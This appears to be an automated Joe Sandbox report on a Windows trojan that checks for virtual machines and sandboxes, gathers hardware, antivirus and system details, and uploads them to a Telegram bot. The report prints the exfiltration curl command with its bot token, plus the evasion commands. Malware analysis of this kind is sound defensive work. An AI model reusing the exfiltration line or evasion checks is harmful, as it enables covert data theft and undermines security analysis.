Source: getmac.exe, 0000000D.00000003.1749820674.000001733F58F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1750713120.000001733F597000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1749909296.000001733F594000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: 9KEZfGRjyK.exe | Binary or memory string: HYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-Vq
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"
Source: tasklist.exe, 00000022.00000002.1814467976.0000021984190000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exea\Local\Tew
Source: 9KEZfGRjyK.exe | Binary or memory string: QEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IMAGENAME eq vboxservice.exe\
Source: tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B9049174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B9049174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B903AA60 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF7B903AA60
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B902E030 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7B902E030
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug (reported for 10 tasklist.exe instances)
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B904C07C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7B904C07C
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B9049174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B9049174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B9049318 SetUnhandledExceptionFilter,0_2_00007FF7B9049318
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumber
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumber
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get name
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,size
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\getmac.exe "getmac"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumber
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: C:\Windows\System32\curl.exe | Queries volume information: C:\Users\user\Desktop\system_info.txt VolumeInformation
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B902FDF0 ProcessPrng,GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,ProcessPrng,0_2_00007FF7B902FDF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B902AB10 GetSystemTimePreciseAsFileTime,0_2_00007FF7B902AB10
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B901DA70 GetTimeZoneInformationForYear,0_2_00007FF7B901DA70
Source: C:\Windows\System32\curl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (reported twice)
MITRE ATT&CK Matrix (flattened by extraction; rebuilt below as one line per tactic, techniques in the report's row order; bracketed numbers are the report's signature references for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [341]; Native API [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [12]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [33]; Disable or Modify Tools [1]; Process Injection [12]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery [2]; Security Software Discovery [461]; Virtualization/Sandbox Evasion [33]; Process Discovery [2]; File and Directory Discovery [1]; System Information Discovery [135]; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service [1]; Encrypted Channel [21]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (rendered graph and legend not included in this extraction). Graph ID: 1578571; Sample: 9KEZfGRjyK.exe; Start date: 19/12/2024; Architecture: WINDOWS; Score: 72. The root process 9KEZfGRjyK.exe starts getmac.exe, WMIC.exe, systeminfo.exe and 18 other processes (each with conhost.exe children). Network contact: api.telegram.org (149.154.167.220, port 443, local port 49775, TELEGRAMRU, United Kingdom) and 127.0.0.1. Signatures attached in the graph: Machine Learning detection for sample; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Sigma detected: Rare Remote Thread Creation By Uncommon Source Image; Uses the Telegram API (likely for C&C communication); Contain functionality to detect virtual machines; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter); Writes or reads registry keys via WMI; Queries sensitive disk information (via WMI, Win32_DiskDrive).
Antivirus detection
Source | Detection | Scanner
9KEZfGRjyK.exe | 5% | ReversingLabs
9KEZfGRjyK.exe | 100% | Joe Sandbox ML
No Antivirus matches for dropped files, domains or URLs
Domains
Name | IP | Active | Malicious | Reputation
api.telegram.org | 149.154.167.220 | true | false | high

URLs
Name | Malicious | Reputation
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument | false | high

URLs from memory strings
Name | Source | Malicious | Reputation
https://api.telegram.org/botc | 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o | 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC: | curl.exe, 0000002D.00000002.2465503271.0000025DD64C0000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentLC | curl.exe, 0000002D.00000002.2465599836.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464902792.0000025DD64DE000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt1q | 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram. | curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465008395.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.telegram.org/botctK.exe | 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | false | high
https://docs.rs/getrandom#nodejs-es-module-support | 9KEZfGRjyK.exe | false | high

IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false

Private/loopback IP
127.0.0.1
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1578571
                      Start date and time:2024-12-19 22:43:06 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 26s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:49
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:9KEZfGRjyK.exe
                      renamed because original name is a hash value
                      Original Sample Name:73b0e64dcc0df2f2ac4d461245021e6a.exe
                      Detection:MAL
                      Classification:mal72.troj.evad.winEXE@64/2@1/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 17
                      • Number of non-executed functions: 55
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: 9KEZfGRjyK.exe
Time | Type | Description
16:43:58 | API Interceptor | 8x Sleep call for process: WMIC.exe modified
Context for IP 149.154.167.220
Associated Sample Name / URL | Detection | Threat Name
file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer
PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT
PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT
66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
_Company.exe | malicious | Snake Keylogger, VIP Keylogger
F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger
D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger
Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger
PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT
chrome11.exe | malicious | Unknown

Context for domain api.telegram.org
Associated Sample Name / URL | Detection | Threat Name | Context
PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
_Company.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 149.154.167.220
D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 149.154.167.220
Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
chrome11.exe | malicious | Unknown | 149.154.167.220
chrome11.exe | malicious | Unknown | 149.154.167.220

Context for ASN TELEGRAMRU
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 149.154.167.220
file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 149.154.167.99
PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
pM3fQBuTLy.exe | malicious | Vidar | 149.154.167.99
QIo3SytSZA.exe | malicious | Vidar | 149.154.167.99
_Company.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 149.154.167.220
D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 149.154.167.220

Context for match 74954a0c86284d0d6e1c4efefe92b521
Associated Sample Name / URL | Detection | Threat Name | Context
Hkeyboard.dll | malicious | Unknown | 149.154.167.220
67618a47ee8c5.vbs | malicious | Mint Stealer | 149.154.167.220
PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer | 149.154.167.220
webhook.exe | malicious | Unknown | 149.154.167.220
loader.exe | malicious | Unknown | 149.154.167.220
loader.exe | malicious | Unknown | 149.154.167.220
chos.exe | malicious | Unknown | 149.154.167.220
file.exe | malicious | Unknown | 149.154.167.220
yiDQb6GkBq.exe | malicious | Amadey, LummaC Stealer, Vidar | 149.154.167.220
Document.lnk.download.lnk | malicious | Unknown | 149.154.167.220
                                          No context
                                          Process:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                          File Type:ASCII text, with CRLF, CR, LF line terminators
                                          Category:dropped
                                          Size (bytes):3358
                                          Entropy (8bit):4.789579967493789
                                          Encrypted:false
                                          SSDEEP:96:z5DMzjuDyC2+qS8wSkKdQe82+Uq1OcCXL:9DqC2+qSPSkKJ82tLXL
                                          MD5:CD0F502444307F4021FE0A2F8D203787
                                          SHA1:8902442774AE4A231AA92A89E962C812A80AFA24
                                          SHA-256:E9960F02B7753EFCD72E7AC77E1C6E2AD7673291BA77CB53400C439C0DC820E1
                                          SHA-512:A1D7AABF0003F48BCB35B5CF6C90681C776ECB70AC763E15547D952050735F4EFFA52876D710F1F56C591F47C9B278A413D659AD43E39336537389EAE251A863
                                          Malicious:false
                                          Preview:Computer Name: user-PC.User Name: user.BIOS Serial Number: SerialNumber ...8Z7GLAHHRT.Motherboard Serial Number: SerialNumber ...4895672044416658.CPU Info: Name ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.Total RAM: TotalPhysicalMemory ...4293971968.Disk Info: Model Size ...ANZ1RF5L SCSI Disk Device 412300001200.Antivirus: displayName ...Windows Defender.MAC Address: Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}.System Info: Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type:
                                          Process:C:\Windows\System32\curl.exe
                                          File Type:ASCII text, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):557
                                          Entropy (8bit):3.10752934803616
                                          Encrypted:false
                                          SSDEEP:6:I2swj2SAykymUeC3/8UniegCSgOgcdSgOgcdivIdcFFmVvT02FcaVlx:Vz6ykymUePbnc9cL9cddcFFir02FNHx
                                          MD5:7275061B2B7E13CB9F3A95E0A4E7811E
                                          SHA1:0136EB08108C1E19B647CCF7988A23E0018DF5E4
                                          SHA-256:6557EE4847B998344908C9F37FA02A2760A2366EF3473D0865CEB914E23D0B8A
                                          SHA-512:2A8591FEC4837B451BC8561A8BFA82E5628C02DAE87237FAC10CE34655C91B5BDCC6FC78316741651BAC5399DE58A86E6F1B1590838565EF6D37458E5B84FFC9
                                          Malicious:false
                                          Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0. 88 4130 0 0 100 3664 0 1434 0:00:02 0:00:02 --:--:-- 1435.100 4130 100 466 100 3664 182 1432 0:00:02 0:00:02 --:--:-- 1615..
                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Entropy (8bit):6.301112846910871
                                          TrID:
                                          • Win64 Executable GUI (202006/5) 92.65%
                                          • Win64 Executable (generic) (12005/4) 5.51%
                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                          • DOS Executable Generic (2002/1) 0.92%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:9KEZfGRjyK.exe
                                          File size:378'880 bytes
                                          MD5:73b0e64dcc0df2f2ac4d461245021e6a
                                          SHA1:ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
                                          SHA256:99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
                                          SHA512:e6921dcba48d193bd592d316613a3fffc7bdf03868ff07dd2553cc32bbf2318dc54f777a90ecb2c2782471567f7657f9185f65814e43e7c0f5d820593ccbcf99
                                          SSDEEP:6144:lE3fAFcnP6AAHOZ7Uh2EaGQGGapOdTFTh8kJM1VZn:lE34FgAEGQGGTx+WM1
                                          TLSH:B9845B25FE565DACD58BC0B482128A726932B8CE0B31B9FF12D442353E69AF16F3C754
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H7...V`..V`..V`......V`...c..V`...d..V`...e.$V`.G.a..V`..Va..V`..V`.6V`......V`...b..V`.Rich.V`.........PE..d.....dg.........."
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x140038d60
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x140000000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x67648104 [Thu Dec 19 20:24:36 2024 UTC]
                                          TLS Callbacks:0x4002a890, 0x1
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:0
                                          File Version Major:6
                                          File Version Minor:0
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:0
                                          Import Hash:df132870cc8376ee210867916013d887
Entrypoint instructions (as disassembled by the report):
                                          dec eax
                                          sub esp, 28h
                                          call 00007F7AF4FB0908h
                                          dec eax
                                          add esp, 28h
                                          jmp 00007F7AF4FB0497h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          nop word ptr [eax+eax+00000000h]
                                          dec eax
                                          sub esp, 10h
                                          dec esp
                                          mov dword ptr [esp], edx
                                          dec esp
                                          mov dword ptr [esp+08h], ebx
                                          dec ebp
                                          xor ebx, ebx
                                          dec esp
                                          lea edx, dword ptr [esp+18h]
                                          dec esp
                                          sub edx, eax
                                          dec ebp
                                          cmovb edx, ebx
                                          dec esp
                                          mov ebx, dword ptr [00000010h]
                                          dec ebp
                                          cmp edx, ebx
                                          jnc 00007F7AF4FB0638h
                                          inc cx
                                          and edx, 8D4DF000h
                                          wait
                                          add al, dh
                                          Programming Language:
                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x582bc | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5f000 | 0x1f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x5b000 | 0x2a9c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x60000 | 0x668 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x50ff0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x51200 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x50eb0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x40000 | 0x458 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3ed70 | 0x3ee00 | b18ef078dbb571020d954c6b115eb34c | False | 0.4967344371272366 | data | 6.355785043053073 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x40000 | 0x192fa | 0x19400 | a57eadc0bc392731421b1ee050a6b056 | False | 0.38722153465346537 | data | 5.407331463120315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5a000 | 0xac0 | 0x200 | cdb4f452a9c373c6ece62e34b50b2fbe | False | 0.28515625 | data | 2.4546151187241256 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x5b000 | 0x2a9c | 0x2c00 | a18a17c2855b033d9d8056b0eb1b3c8c | False | 0.4833984375 | data | 5.455692511911118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.padding | 0x5e000 | 0x8a4 | 0xa00 | 7b7f26e348909ab91cf74011db8d3a94 | False | 0.891015625 | data | 7.3761949714995865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x5f000 | 0x1f8 | 0x200 | f63d27195363577233775bb9fd0e9a51 | False | 0.484375 | data | 2.830251446092126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x60000 | 0x668 | 0x800 | e005ebc65f734c9ef812873e4dc54879 | False | 0.5458984375 | data | 4.849281107799458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x5f060 | 0x198 | OpenPGP Public Key | English | United States | 0.5122549019607843
DLL | Import
api-ms-win-core-synch-l1-2-0.dll | WakeByAddressAll, WakeByAddressSingle, WaitOnAddress
bcryptprimitives.dll | ProcessPrng
bcrypt.dll | BCryptGenRandom
ADVAPI32.dll | SystemFunction036
